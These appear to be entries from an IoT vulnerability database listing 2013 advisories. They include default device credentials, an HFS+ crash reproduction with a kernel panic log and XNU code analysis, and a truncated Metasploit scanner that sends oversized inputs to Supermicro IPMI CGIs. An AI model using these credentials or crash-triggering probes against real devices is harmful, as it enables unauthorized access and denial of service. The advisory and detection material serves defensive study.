VARIoT IoT vulnerabilities database


VAR-201311-0457 No CVE Belkin NetCam Wi-Fi Camera with Night Vision Video Stream Backdoor Security Bypass Vulnerability CVSS V2: 6.8
CVSS V3: -
Severity: MEDIUM
The Belkin NetCam Wi-Fi Camera's online video stream is accessible with the fixed username and password admin/admin, allowing an attacker to gain unauthorized access to sensitive information. This account information cannot be changed by the user. Belkin NetCam Wi-Fi Camera with Night Vision is a wireless network camera with a night vision function from Belkin. A security bypass vulnerability exists in the Belkin NetCam Wi-Fi Camera with Night Vision, which originates from the program's use of hard-coded credentials. A remote attacker could use this vulnerability to bypass security restrictions and gain access
VAR-201311-0513 No CVE MikroTik RouterOS Default Management Account Vulnerability CVSS V2: 6.8
CVSS V3: -
Severity: MEDIUM
The MikroTik RouterOS software turns a standard PC into a network router. MikroTik RouterOS has a default administrative account 'admin' with a blank password, which allows remote attackers to use this account to gain unauthorized access to the device.
VAR-201311-0514 No CVE NEC VOIP Phones default management account vulnerability CVSS V2: 6.8
CVSS V3: -
Severity: MEDIUM
NEC VOIP Phones is a VoIP phone device. NEC VOIP Phones has a default management account 'ADMIN' with the password '632379', which allows remote attackers to use this account to gain unauthorized access to the device.
VAR-201311-0157 CVE-2013-5442 IBM Security Network Protection firmware on XGS 5100 cross-site scripting vulnerability CVSS V2: 4.3
CVSS V3: -
Severity: MEDIUM
Cross-site scripting (XSS) vulnerability in the Local Management Interface (LMI) in IBM Security Network Protection on XGS 5100 devices with firmware 5.1 before 5.1.0.6 and 5.1.1 before 5.1.1.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. IBM Security Network Protection is a device of the IBM Security Intrusion Prevention product portfolio. An attacker may leverage this issue to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. The system can monitor application usage, website access and operation execution within the network to avoid threats such as malware and botnets
VAR-201311-0290 CVE-2013-5568 Cisco Adaptive Security Appliance Auto-Update Remote Denial of Service Vulnerability CVSS V2: 7.1
CVSS V3: -
Severity: HIGH
The auto-update implementation in Cisco Adaptive Security Appliance (ASA) Software 9.0.3.6 and earlier allows remote attackers to cause a denial of service (device reload) via crafted update data, aka Bug ID CSCui33308. Attackers can exploit this issue to cause an affected device to reload, resulting in a denial-of-service condition. This issue is being tracked by Cisco Bug ID CSCui33308
VAR-201311-0236 CVE-2013-6682 Cisco Adaptive Security Appliance Phone Proxy Database Security Bypass Vulnerability CVSS V2: 6.4
CVSS V3: -
Severity: MEDIUM
The phone-proxy implementation in Cisco Adaptive Security Appliance (ASA) Software 9.0.3.6 and earlier does not properly validate X.509 certificates, which allows remote attackers to cause a denial of service (connection-database corruption) via an invalid entry, aka Bug ID CSCui33299. The vendor has confirmed this vulnerability and published it as Bug ID CSCui33299. A third party may be able to cause a denial of service (connection-database corruption) via an invalid entry. Cisco Adaptive Security Appliance (ASA) is prone to a security-bypass vulnerability. Successfully exploiting this issue will allow attackers to bypass security restrictions, for example by inserting an invalid entry into the phone proxy connection database. This issue is tracked by Cisco Bug ID CSCui33299. The vulnerability stems from the fact that the phone proxy connection database does not properly handle untrusted certificates
VAR-201311-0355 CVE-2013-6799 Apple Mac OS X denial of service (DoS) vulnerability CVSS V2: 4.7
CVSS V3: -
Severity: MEDIUM
Apple Mac OS X 10.9 allows local users to cause a denial of service (memory corruption or panic) by creating a hard link to a directory. NOTE: this vulnerability exists because of an incomplete fix for CVE-2010-0105. Exploiting this issue allows local, unprivileged users to crash the affected system, denying further service to legitimate users.

MacOSX/XNU HFS Multiple Vulnerabilities
Maksymilian Arciemowicz
http://cxsecurity.com/
http://cifrex.org/
===================

On November 8th, I reported a vulnerability in hard links for HFS+ (CVE-2013-6799)
http://cxsecurity.com/issue/WLB-2013110059

The HFS+ file system does not apply strict privilege rules during the creation of hard links. The ability to create hard links to directories is wrongly implemented, and this issue affects OS versions greater than or equal to 10.5. Officially, Apple allows you to create hard links only for your Time Machine. To create N hard links, you must use a special algorithm which creates links from the top of the file system tree. This means that first we create the directory structure and, once it is created, we need to go from top to bottom creating hard links.

Last time I mentioned the possibility of a kernel crash by performing the 'ls' command. This situation occurs in conjunction with the 'find' application. Commands such as 'ls' behave in unexpected ways. Apple are going to find this crash point in code.

To create a huge hard link structure, use this code
http://cert.cx/stuff/l2.c

-----------------------------------
h1XSS:tysiak cx$ uname -a
Darwin 000000000000000.home 13.1.0 Darwin Kernel Version 13.1.0: Thu Jan 16 19:40:37 PST 2014; root:xnu-2422.90.20~2/RELEASE_X86_64 x86_64
h1xss:tysiak cx$ gcc -o l2 l2.c
h1xss:tysiak cx$ ./l2 1000
...
h1xss:tysiak cx$ cat loop.sh
#!/bin/bash
while [ 1 ] ; do
ls -laR B > /dev/null
done
h1xss:tysiak cx$ sh ./loop.sh
ls: B: No such file or directory
ls: X1: No such file or directory
...
ls: X8: Bad address
ls: X1: Bad address
ls: X2: Bad address
...
ls: X8: No such file or directory
./loop.sh: line 4:  8816 Segmentation fault: 11  ls -laR B > /dev/null
./loop.sh: line 4:  8818 Segmentation fault: 11  ls -laR B > /dev/null
ls: B: No such file or directory
ls: X1: No such file or directory
ls: X2: No such file or directory
...
ls: X1: No such file or directory
ls: X2: No such file or directory
-----------
...
-----------
Feb  9 21:16:38 h1xss.home ReportCrash[9419]: Saved crash report for ls[9418] version 230 to /Users/freak/Library/Logs/DiagnosticReports/ls_2014-02-09-211638_h1XSS.crash
-----------

What we can see here is unexpected behavior of the LS command. The LS process is also affected by an infinite loop (recursion?).

-----------
h1xss:tysiak cx$ ps -fp 8822
  UID   PID  PPID   C STIME   TTY           TIME CMD
  501  8822  8810   0  7:36 ttys002   62:19.65 ls -laR B
-----------

or, used in parallel with the (find . > /dev/null) command, it causes a kernel crash

-----------
Mon Mar 31 20:30:41 2014
panic(cpu 0 caller 0xffffff80044dbe2e): Kernel trap at 0xffffff8004768838, type 13=general protection, registers:
CR0: 0x0000000080010033, CR2: 0xffffff8122877004, CR3: 0x0000000001a5408c, CR4: 0x00000000001606e0
RAX: 0xffffff802bc148a0, RBX: 0xdeadbeefdeadbeef, RCX: 0x0000000000008000, RDX: 0x0000000000000000
RSP: 0xffffff8140d9b990, RBP: 0xffffff8140d9b9a0, RSI: 0x0000000000000018, RDI: 0xffffff802f23bcd0
R8:  0xffffff8140d9bc1c, R9:  0xffffff802f26e960, R10: 0xffffff8140d9ba2c, R11: 0x0000000000000f92
R12: 0xffffff801ba1a008, R13: 0xffffff8140d9bb20, R14: 0xffffff802f23bcd0, R15: 0xffffff802f26e960
RFL: 0x0000000000010282, RIP: 0xffffff8004768838, CS:  0x0000000000000008, SS:  0x0000000000000010
Fault CR2: 0xffffff8122877004, Error code: 0x0000000000000000, Fault CPU: 0x0

Backtrace (CPU 0), Frame : Return Address
0xffffff811eee8c50 : 0xffffff8004422fa9

BSD process name corresponding to current thread: ls
-----------

XNU is the computer operating system kernel that Apple Inc. acquired and developed for use in the Mac OS X operating system and released as free and open source software as part of the Darwin operating system.

We can try to look at the HFS implementation code. Let's start static code analysis using the cifrex.org tool!

-1.---------------------------------------------------------
Unchecked Return Value to NULL Pointer Dereference in hfs_vfsops.c

Code:
http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_vfsops.c

--- hfs_vfsops.c ----------------------------
/*
 * HFS filesystem related variables.
 */
int
hfs_sysctl(int *name, __unused u_int namelen, user_addr_t oldp, size_t *oldlenp,
           user_addr_t newp, size_t newlen, vfs_context_t context)
{
...
		if ((newlen <= 0) || (newlen > MAXPATHLEN))
			return (EINVAL);

		bufsize = MAX(newlen * 3, MAXPATHLEN);
		MALLOC(filename, char *, newlen, M_TEMP, M_WAITOK);
		if (filename == NULL) {      <===================================== filename CHECK
			error = ENOMEM;
			goto encodinghint_exit;
		}
		MALLOC(unicode_name, u_int16_t *, bufsize, M_TEMP, M_WAITOK);
		if (filename == NULL) {      <====================================== double CHECK?
			error = ENOMEM;
			goto encodinghint_exit;
		}

		error = copyin(newp, (caddr_t)filename, newlen);
		if (error == 0) {
			error = utf8_decodestr((u_int8_t *)filename, newlen - 1, unicode_name,
			                       &bytes, bufsize, 0, UTF_DECOMPOSED);
			if (error == 0) {
				hint = hfs_pickencoding(unicode_name, bytes / 2);
				error = sysctl_int(oldp, oldlenp, USER_ADDR_NULL, 0, (int32_t *)&hint);
			}
		}
--- hfs_vfsops.c ----------------------------

Checking 'filename' twice makes no sense. Probably 'unicode_name' should be checked in the second condition.

-2.---------------------------------------------------------
Possible Buffer Overflow in resource fork (hfs_vnops.c)

The unverified value returned by snprintf() may be bigger than the declared buffer (MAXPATHLEN).
https://developer.apple.com/library/mac/documentation/Darwin/Reference/ManPages/man3/snprintf.3.html
---
The snprintf() and vsnprintf() functions will write at most n-1 of the characters printed into the output string (the n'th character then gets the terminating `\0'); if the return value is greater than or equal to the n argument, the string was too short and some of the printed characters were discarded. The output is always null-terminated.
---

Code:
http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_vnops.c

--- hfs_vnops.c ----------------------------
...
/*
 * hfs_vgetrsrc acquires a resource fork vnode corresponding to the cnode that is
 * found in 'vp'. The rsrc fork vnode is returned with the cnode locked and iocount
 * on the rsrc vnode.
 * ...
 */
int
hfs_vgetrsrc(struct hfsmount *hfsmp, struct vnode *vp, struct vnode **rvpp,
             int can_drop_lock, int error_on_unlinked)
{
...
		/*
		 * Supply hfs_getnewvnode with a component name.
		 */
		cn.cn_pnbuf = NULL;
		if (descptr->cd_nameptr) {
			MALLOC_ZONE(cn.cn_pnbuf, caddr_t, MAXPATHLEN, M_NAMEI, M_WAITOK);
			cn.cn_nameiop = LOOKUP;
			cn.cn_flags = ISLASTCN | HASBUF;
			cn.cn_context = NULL;
			cn.cn_pnlen = MAXPATHLEN;
			cn.cn_nameptr = cn.cn_pnbuf;
			cn.cn_hash = 0;
			cn.cn_consume = 0;
			cn.cn_namelen = snprintf(cn.cn_nameptr, MAXPATHLEN,      <================
			                         "%s%s", descptr->cd_nameptr, _PATH_RSRCFORKSPEC);
		}
		dvp = vnode_getparent(vp);
		error = hfs_getnewvnode(hfsmp, dvp, cn.cn_pnbuf ? &cn : NULL,      <================
		                        descptr, GNV_WANTRSRC | GNV_SKIPLOCK, &cp->c_attr,
		                        &rsrcfork, &rvp, &newvnode_flags);
--- hfs_vnops.c ----------------------------

The pattern is '%s%s', where the sum of the lengths of descptr->cd_nameptr and _PATH_RSRCFORKSPEC may be bigger than the declared buffer size (MAXPATHLEN). The size of descptr->cd_nameptr is MAXPATHLEN and the value of _PATH_RSRCFORKSPEC is

#define _PATH_RSRCFORKSPEC "/..namedfork/rsrc"

whose length is 17 chars. Possibly an overflow of up to 17 chars here?

Now let's see the hfs_getnewvnode function
http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_cnode.c

--- hfs_cnode.c ----------------------------
hfs_getnewvnode(
	struct hfsmount *hfsmp,
	struct vnode *dvp,
	struct componentname *cnp,      <======== WATCH THIS
	struct cat_desc *descp,
	int flags,
	struct cat_attr *attrp,
	struct cat_fork *forkp,
	struct vnode **vpp,
	int *out_flags)
{
...
		if ((*vpp != NULL) && (cnp)) {
			/* we could be requesting the rsrc of a hardlink file... */
			vnode_update_identity (*vpp, dvp, cnp->cn_nameptr, cnp->cn_namelen, cnp->cn_hash,      <== NAMELEN HERE
					(VNODE_UPDATE_PARENT | VNODE_UPDATE_NAME));
...
--- hfs_cnode.c ----------------------------

and the call to vnode_update_identity()
http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/vfs/vfs_cache.c

--- vfs_cache.c ----------------------------
void
vnode_update_identity(vnode_t vp, vnode_t dvp, const char *name, int name_len, uint32_t name_hashval, int flags)
{
...
	if ( (flags & VNODE_UPDATE_NAME) ) {
		if (name != vp->v_name) {
			if (name && *name) {
				if (name_len == 0)
					name_len = strlen(name);
				tname = vfs_addname(name, name_len, name_hashval, 0);      <== NAMELEN HERE
			}
		} else
			flags &= ~VNODE_UPDATE_NAME;
	}
...

const char *
vfs_addname(const char *name, uint32_t len, u_int hashval, u_int flags)
{
	return (add_name_internal(name, len, hashval, FALSE, flags));      <== CALL
}
--- vfs_cache.c ----------------------------

And an invalid memory reference in add_name_internal()

--- vfs_cache.c ----------------------------
static const char *
add_name_internal(const char *name, uint32_t len, u_int hashval, boolean_t need_extra_ref, __unused u_int flags)
{
	struct stringhead *head;
	string_t	*entry;
	uint32_t	chain_len = 0;
	uint32_t	hash_index;
	uint32_t	lock_index;
	char		*ptr;

	/*
	 * if the length already accounts for the null-byte, then
	 * subtract one so later on we don't index past the end
	 * of the string.
	 */
	if (len > 0 && name[len-1] == '\0') {      <===== INVALID MEMORY REFERENCE
		len--;
	}
	if (hashval == 0) {
		hashval = hash_string(name, len);
	}
--- vfs_cache.c ----------------------------

-3.---------------------------------------------------------
Unchecked Return Value to NULL Pointer Dereference in hfs_catalog.c and not only

Please pay attention that a buffer length check (stored in some variable) should be performed; also the return value of the *alloc() function family should be verified for possible NULL pointers. Here are a few FALSE / POSITIVE examples.

http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_catalog.c

--- hfs_catalog.c ----------------------------
/*
 * builddesc - build a cnode descriptor from an HFS+ key
 */
static int
builddesc(const HFSPlusCatalogKey *key, cnid_t cnid, u_int32_t hint, u_int32_t encoding,
	int isdir, struct cat_desc *descp)
{
	int result = 0;
	unsigned char * nameptr;
	size_t bufsize;
	size_t utf8len;
	unsigned char tmpbuff[128];

	/* guess a size... */
	bufsize = (3 * key->nodeName.length) + 1;
	if (bufsize >= sizeof(tmpbuff) - 1) {      <============================
		MALLOC(nameptr, unsigned char *, bufsize, M_TEMP, M_WAITOK);      <= MALLOC FAIL
	} else {
		nameptr = &tmpbuff[0];
	}
	result = utf8_encodestr(key->nodeName.unicode,
			key->nodeName.length * sizeof(UniChar),
			nameptr, (size_t *)&utf8len,      <============================
...
	maxlinks = MIN(entrycnt, (u_int32_t)(uio_resid(uio) / SMALL_DIRENTRY_SIZE));
	bufsize = MAXPATHLEN + (maxlinks * sizeof(linkinfo_t)) + sizeof(*iterator);
	if (extended) {
		bufsize += 2*sizeof(struct direntry);
	}
	MALLOC(buffer, void *, bufsize, M_TEMP, M_WAITOK);      <============================
	bzero(buffer, bufsize);
...
			FREE(nameptr, M_TEMP);
			MALLOC(nameptr, unsigned char *, bufsize, M_TEMP, M_WAITOK);      <==============
			result = utf8_encodestr(key->nodeName.unicode,
					key->nodeName.length * sizeof(UniChar),
					nameptr, (size_t *)&utf8len, bufsize, ':', 0);
		}
...
		cnp = (const CatalogName *)&ckp->hfsPlus.nodeName;
		bufsize = 1 + utf8_encodelen(cnp->ustr.unicode,
					cnp->ustr.length * sizeof(UniChar), ':', 0);
		MALLOC(new_nameptr, u_int8_t *, bufsize, M_TEMP, M_WAITOK);      <========
		result = utf8_encodestr(cnp->ustr.unicode,
					cnp->ustr.length * sizeof(UniChar),
					new_nameptr, &tmp_namelen, bufsize, ':', 0);
--- hfs_catalog.c ----------------------------

The above examples do not look nice either. Is the crux of the application and kernel crash problem among them?

I informed Apple of those possible errors; more than a month has passed and I still have not received any comment or solution.

--- 1. References ---
http://cxsecurity.com/issue/WLB-2014040027
http://cxsecurity.com/cveshow/CVE-2013-6799/
http://cxsecurity.com/cveshow/CVE-2010-0105/

--- 2. Greetz ---
Kacper George and Michal

--- 3. Credit ---
Maksymilian Arciemowicz
http://cxsecurity.com/
http://cifrex.org/
http://cert.cx/

Best regards,
CXSEC TEAM
http://cxsec.org/
VAR-201311-0405 No CVE SAP CRM Internet Sales / CRM Internet Service Web Application unspecified SQL injection vulnerability CVSS V2: 9.0
CVSS V3: -
Severity: HIGH
SAP is a world-renowned provider of enterprise management and collaborative business solutions. SQL injection vulnerabilities exist in multiple SAP products. The vulnerability is due to incorrect filtering of user-submitted input by the CRM Internet Sales and CRM Internet Service web applications, allowing remote attackers to inject SQL queries into the back-end database and manipulate or retrieve database information
VAR-201312-0070 CVE-2013-3707 Novell Open Enterprise Server novell-nrm package denial of service (DoS) vulnerability CVSS V2: 4.3
CVSS V3: -
Severity: MEDIUM
The HTTPSTK service in the novell-nrm package before 2.0.2-297.305.302.3 in Novell Open Enterprise Server 2 (OES 2) Linux, and OES 11 Linux Gold and SP1, does not make the intended SSL_free and SSL_shutdown calls for the close of a TCP connection, which allows remote attackers to cause a denial of service (service crash) by establishing many TCP connections to port 8009. Novell Remote Manager is prone to a vulnerability that may allow attackers to cause a denial-of-service condition. Successful exploits may allow the attacker to crash the affected application causing denial-of-service conditions. Versions prior to Novell Remote Manager 2.0.2-297.305.302.3 are vulnerable
VAR-201311-0287 CVE-2013-5215 FOSCAM Wireless IP Camera Cross-Site Scripting Vulnerability CVSS V2: 4.3
CVSS V3: -
Severity: MEDIUM
Cross-site scripting (XSS) vulnerability in the web interface "WiFi scan" option in FOSCAM Wireless IP Cameras allows remote attackers to inject arbitrary web script or HTML via the SSID. The FOSCAM Wireless IP Camera is a wireless IP camera. FOSCAM Wireless IP Camera is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks
VAR-201311-0282 CVE-2013-4740 Goodix gt915 touchscreen driver privilege escalation vulnerability in the Linux kernel as used in Qualcomm Innovation Center Android contributions for MSM devices CVSS V2: 6.9
CVSS V3: -
Severity: MEDIUM
goodix_tool.c in the Goodix gt915 touchscreen driver for the Linux kernel 3.x, as used in Qualcomm Innovation Center (QuIC) Android contributions for MSM devices and other products, relies on user-space length values for kernel-memory copies of procfs file content, which allows attackers to gain privileges or cause a denial of service (memory corruption) via an application that provides crafted values. Android For MSM is prone to multiple local memory-corruption vulnerabilities that occur in the Goodix GT915 touchscreen driver because it fails to properly bounds-check user-supplied data. Local attackers can exploit these issues to execute arbitrary code. Failed exploit attempts may cause a denial-of-service condition. The Linux kernel is the kernel used by the open source operating system Linux released by the American Linux Foundation. The NFSv4 implementation is one of the distributed file system protocols. There is a security vulnerability in the goodix_tool.c file in the goodix gt915 touch screen driver of the Linux kernel 3.x version using the Android system.

The issues were found in the write handler of the procfs entry created by the driver, which by default is readable and writeable to users without any specific privileges.

CVE-2013-4740
-------------
When processing data written to the procfs file, the Goodix gt915 touchscreen driver is using user space supplied content as length values in subsequent memory manipulation operations without bounds checking. This can lead to multiple memory corruption issues. An application with access to the respective file can use this flaw to, e.g., elevate privileges.

Access Vector: local
Security Risk: high
Vulnerability: CWE-20 (Improper Input Validation)

CVE-2013-6122
-------------
When processing arguments passed to the procfs write handler of the Goodix gt915 touchscreen driver, user space data is copied to a global variable and used without a mutual-exclusion mechanism. The global structure used by the procfs write handler can be accessed concurrently by more than one process. This would allow local attackers to bypass the input validation checks (such as introduced by the fix for CVE-2013-4740). An application with access to the respective file can use this flaw to, e.g., alter the internal state of the handler, bypass security checks, or create a denial-of-service condition.

Access Vector: local
Security Risk: medium
Vulnerability: CWE-362 (Concurrent Execution using Shared Resource with Improper Synchronization)

Affected versions
-----------------
All Android releases from CAF using a Linux kernel from the following heads:
- jb_3*
- msm-3.10

Patch
-----
We advise customers to apply the following patches:
https://www.codeaurora.org/cgit/quic/la/kernel/msm-3.10/commit/?id=f53bcf29a6e7a66b3d935b8d562fa00829261f05

Acknowledgement
===============
Qualcomm Innovation Center, Inc. (QuIC) thanks Jonathan Salwan of the Sysdream Security Lab for reporting the related issues and working with QuIC to help improve Android device security.
https://www.codeaurora.org/projects/security-advisories/multiple-memory-corruption-issues-and-race-condition-goodix-gt915-touchscreen-driver-procfs-handler
VAR-201311-0208 CVE-2013-6122 Goodix gt915 touchscreen driver access restriction bypass vulnerability in the Linux kernel as used in Qualcomm Innovation Center Android contributions for MSM devices CVSS V2: 6.9
CVSS V3: -
Severity: MEDIUM
goodix_tool.c in the Goodix gt915 touchscreen driver for the Linux kernel 3.x, as used in Qualcomm Innovation Center (QuIC) Android contributions for MSM devices and other products, does not properly synchronize updates to a global variable, which allows local users to bypass intended access restrictions or cause a denial of service (memory corruption) via crafted arguments to the procfs write handler. Android For MSM project is prone to a local security-bypass vulnerability because it fails to sufficiently validate user-supplied input. An attacker with physical access to the computer can exploit this issue to bypass security restrictions that may aid in further attacks. The Linux kernel is the kernel used by the open source operating system Linux released by the American Linux Foundation. The NFSv4 implementation is one of the distributed file system protocols. There is a buffer overflow vulnerability in the goodix_tool.c file in the goodix gt915 touch screen driver of the Linux kernel 3.x version using the Android system. The vulnerability comes from the fact that the program does not correctly synchronize the updated global variables. The QuIC advisory text for this issue is reproduced in full under VAR-201311-0282 (CVE-2013-4740) above.
https://www.codeaurora.org/projects/security-advisories/multiple-memory-corruption-issues-and-race-condition-goodix-gt915-touchscreen-driver-procfs-handler
VAR-201311-0295 CVE-2013-5554 Cisco Wide Area Application Services Mobile Server Web Management interface directory traversal vulnerability CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
Directory traversal vulnerability in the web-management interface in the server in Cisco Wide Area Application Services (WAAS) Mobile before 3.5.5 allows remote attackers to upload and execute arbitrary files via a crafted POST request, aka Bug ID CSCuh69773. The vendor has confirmed this vulnerability and published it as Bug ID CSCuh69773. A third party may be able to upload and execute arbitrary files via a crafted POST request. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of CAB files uploaded through ReportReceiver. By uploading a crafted CAB file, an attacker is able to add a hostile web page to the web server. Using this, an attacker is able to run arbitrary code as either DefaultAppPool or NetworkService, depending on the operating system version. Failed exploit attempts may result in a denial-of-service condition. This issue is being tracked by Cisco bug ID CSCuh69773. The vulnerability stems from the fact that the program does not correctly handle HTTP POST requests
VAR-201312-0075 CVE-2013-3622 Supermicro X9 generation motherboard IPMI firmware arbitrary code execution vulnerability CVSS V2: 9.0
CVSS V3: -
Severity: HIGH
Buffer overflow in logout.cgi in the Intelligent Platform Management Interface (IPMI) with firmware before 3.15 (SMT_X9_315) on Supermicro X9 generation motherboards allows remote authenticated users to execute arbitrary code via the SID parameter. Supermicro IPMI is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. Attackers may be able to execute arbitrary code with root privileges in the context of the affected firmware. Failed exploit attempts will likely result in denial-of-service conditions. Supermicro IPMI running firmware versions prior to SMT_X9_315 are vulnerable. Supermicro Intelligent Platform Management Interface (IPMI) is an IPMI card (Intelligent Platform Management Interface) of Supermicro, which can remotely control the system, such as remote booting, entering BIOS, etc
VAR-201311-0294 CVE-2013-5553 Cisco IOS denial of service (DoS) vulnerability CVSS V2: 7.8
CVSS V3: -
Severity: HIGH
Multiple memory leaks in Cisco IOS 15.1 before 15.1(4)M7 allow remote attackers to cause a denial of service (memory consumption or device reload) by sending a crafted SIP message over (1) IPv4 or (2) IPv6, aka Bug IDs CSCuc42558 and CSCug25383. Cisco IOS is the interconnected network operating system used on most Cisco system routers and network switches. The vulnerability is due to improper handling of specially crafted SIP messages. Cisco IOS is prone to a remote denial-of-service vulnerability. An attacker can exploit this issue to cause an affected system to reload, resulting in a denial-of-service condition. This issue is being tracked by Cisco Bug ID CSCuc42558. The following releases are affected: Cisco IOS 15.1(4)GC, 15.1(4)GC1, 15.1(4)M4, 15.1(4)M5, 15.1(4)M6
VAR-201311-0298 CVE-2013-5558 Cisco TelePresence VX Clinical Assistant WIL-A module access vulnerability CVSS V2: 10.0
CVSS V3: -
Severity: HIGH
The WIL-A module in Cisco TelePresence VX Clinical Assistant 1.2 before 1.21 changes the admin password to an empty password upon a reboot, which makes it easier for remote attackers to obtain access via the administrative interface, aka Bug ID CSCuj17238. The vendor has confirmed this vulnerability and published it as Bug ID CSCuj17238. A third party may gain access through the administrative interface. Exploiting this issue could allow an attacker to bypass certain security restrictions and perform unauthorized actions on the device running the vulnerable application. This issue is being tracked by Cisco Bug ID CSCuj17238. The system can provide remote diagnosis, virtual nursing, medical education and other functions through high-definition video. The vulnerability is caused by an error in the program's handling of administrative passwords. When the system is restarted, the software resets the admin password to an empty password. An attacker could exploit this vulnerability to gain administrative privileges by logging into the management interface
VAR-201311-0305 CVE-2013-5565 Cisco IOS XR OSPFv3 functionality denial of service (DoS) vulnerability CVSS V2: 4.3
CVSS V3: -
Severity: MEDIUM
The OSPFv3 functionality in Cisco IOS XR 5.1 allows remote attackers to cause a denial of service (process crash) via a malformed LSA Type-1 packet, aka Bug ID CSCuj82176. Cisco IOS is the interconnected network operating system used on most Cisco system routers and network switches. An attacker can exploit this issue to cause the OSPFv3 process to crash on an affected device, resulting in a denial-of-service condition. This issue is being tracked by Cisco Bug ID CSCuj82176. The vulnerability is caused by the program not correctly parsing LSA Type-1 packets
VAR-201311-0306 CVE-2013-5566 Cisco NX-OS on Cisco MDS 9000 devices denial of service (DoS) vulnerability CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
Cisco NX-OS 5.0 and earlier on MDS 9000 devices allows remote attackers to cause a denial of service (supervisor CPU consumption) via Authentication Header (AH) authentication in a Virtual Router Redundancy Protocol (VRRP) frame, aka Bug ID CSCte27874. Cisco NX-OS running on Cisco MDS 9000 devices contains a vulnerability that can be used to cause a denial of service (supervisor CPU resource consumption). Cisco MDS 9000 NX-OS Software is prone to a remote denial-of-service vulnerability. Attackers can exploit this issue to cause the device to consume excessive CPU resources, resulting in denial-of-service conditions. This issue is being tracked by Cisco bug ID CSCte27874. Cisco NX-OS is a data center-oriented operating system developed by Cisco. The vulnerability is caused by the program not correctly handling Virtual Router Redundancy Protocol (VRRP) packets
VAR-201312-0076 CVE-2013-3623 Supermicro X9 generation motherboard IPMI firmware stack-based buffer overflow vulnerability CVSS V2: 10.0
CVSS V3: -
Severity: HIGH
Multiple stack-based buffer overflows in cgi/close_window.cgi in the web interface in the Intelligent Platform Management Interface (IPMI) with firmware before 3.15 (SMT_X9_315) on Supermicro X9 generation motherboards allow remote attackers to execute arbitrary code via the (1) sess_sid or (2) ACT parameter. Supermicro IPMI is prone to multiple buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied data. Attackers may be able to execute arbitrary code in the context of the affected firmware. Failed exploit attempts will likely result in denial-of-service conditions. Supermicro IPMI running firmware version SMT_X9_226 is vulnerable. Supermicro Intelligent Platform Management Interface (IPMI) is Supermicro's IPMI management card, which allows the system to be controlled remotely (remote booting, entering the BIOS, and so on). The Metasploit scanner module referenced for this issue follows.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'uri'

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Supermicro Onboard IPMI CGI Vulnerability Scanner',
      'Description'    => %q{
        This module checks for known vulnerabilities in the CGI applications of
        Supermicro Onboard IPMI controllers. These issues currently include several
        unauthenticated buffer overflows in the login.cgi and close_window.cgi
        components.
      },
      'Author'         =>
        [
          'hdm',         # Discovery and analysis
          'juan vazquez' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2013-3621' ],
          [ 'CVE', '2013-3623' ],
          [ 'URL', 'https://www.rapid7.com/blog/post/2013/11/06/supermicro-ipmi-firmware-vulnerabilities/']
        ],
      'DisclosureDate' => '2013-11-06'))
  end

  # Fingerprint the web interface by the vendor string in the landing page.
  def is_supermicro?
    res = send_request_cgi(
      {
        "uri"    => "/",
        "method" => "GET"
      })

    if res and res.code == 200 and res.body.to_s =~ /ATEN International Co Ltd\./
      return true
    else
      return false
    end
  end

  def send_close_window_request(sess)
    res = send_request_cgi({
      'method'        => 'POST',
      'uri'           => "/cgi/close_window.cgi",
      'encode_params' => false,
      'vars_post'     => {
        'sess_sid' => sess
      }
    })

    return res
  end

  # A short sess_sid value must be handled normally; an over-long one crashing
  # the CGI (HTTP 500) indicates the unpatched close_window.cgi.
  def check_close_window
    safe_check = Rex::Text.rand_text_alpha(20)
    trigger_check = Rex::Text.rand_text_alpha(132)

    res = send_close_window_request(safe_check)
    unless res and res.code == 200 and res.body.to_s =~ /Can't find action/
      return false
    end

    res = send_close_window_request(trigger_check)
    unless res and res.code == 500
      return false
    end

    return true
  end

  def send_login_request(name)
    res = send_request_cgi({
      'method'        => 'POST',
      'uri'           => "/cgi/login.cgi",
      'encode_params' => false,
      'vars_post'     => {
        'name' => name,
        'pwd'  => Rex::Text.rand_text_alpha(4)
      }
    })

    return res
  end

  # Same safe-then-oversized probe against login.cgi.
  def check_login
    safe_check = Rex::Text.rand_text_alpha(20)
    trigger_check = Rex::Text.rand_text_alpha(300)

    res = send_login_request(safe_check)
    unless res and res.code == 200 and res.body.to_s =~ /ATEN International Co Ltd\./ and res.body.to_s =~ /top\.location\.href = location\.href/
      return false
    end

    res = send_login_request(trigger_check)
    unless res and res.code == 500
      return false
    end

    return true
  end

  def run_host(ip)
    vprint_status("Checking if it's a Supermicro IPMI web interface...")
    if is_supermicro?
      vprint_good("Supermicro IPMI web interface found")
    else
      vprint_error("Supermicro IPMI web interface not found")
      return
    end

    vprint_status("Checking CVE-2013-3621 (login.cgi Buffer Overflow) ...")
    result = check_login
    if result
      print_good("Vulnerable to CVE-2013-3621 (login.cgi Buffer Overflow)")
      report_vuln({
        :host  => rhost,
        :port  => rport,
        :proto => 'tcp',
        :name  => "Supermicro Onboard IPMI login.cgi Buffer Overflow",
        :refs  => self.references.select { |ref| ref.ctx_val == "2013-3621" }
      })
    end

    vprint_status("Checking CVE-2013-3623 (close_window.cgi Buffer Overflow) ...")
    result = check_close_window
    if result
